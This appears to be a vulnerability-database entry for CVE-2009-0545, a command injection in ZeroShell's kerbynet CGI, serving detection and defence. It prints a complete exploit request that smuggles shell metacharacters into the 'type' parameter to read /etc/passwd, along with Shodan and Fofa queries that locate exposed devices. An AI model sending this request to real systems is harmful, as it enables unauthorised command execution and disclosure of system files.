🔙 목록으로 돌아가기

CVE-2009-0545: ZeroShell <= 1.0beta11 Remote Code Execution

TitleZeroShell <= 1.0beta11 Remote Code Execution
Authorgeeknik
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.
RemediationUpgrade to a patched version of ZeroShell.
CVSS Score10
EPSS Score0.94006
CVE IDCVE-2009-0545
CWE IDCWE-20
Shodan Queryhttp.title:"zeroshell"
Fofa Querytitle="zeroshell"
Tags cve cve2009 edb zeroshell kerbynet rce vkev vuln

🔍 Vulnerability Description

ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.

🌐 HTTP Request

GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-0545.yaml

🦈 Packet Capture: ⬇️ Download cve-2009-0545.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A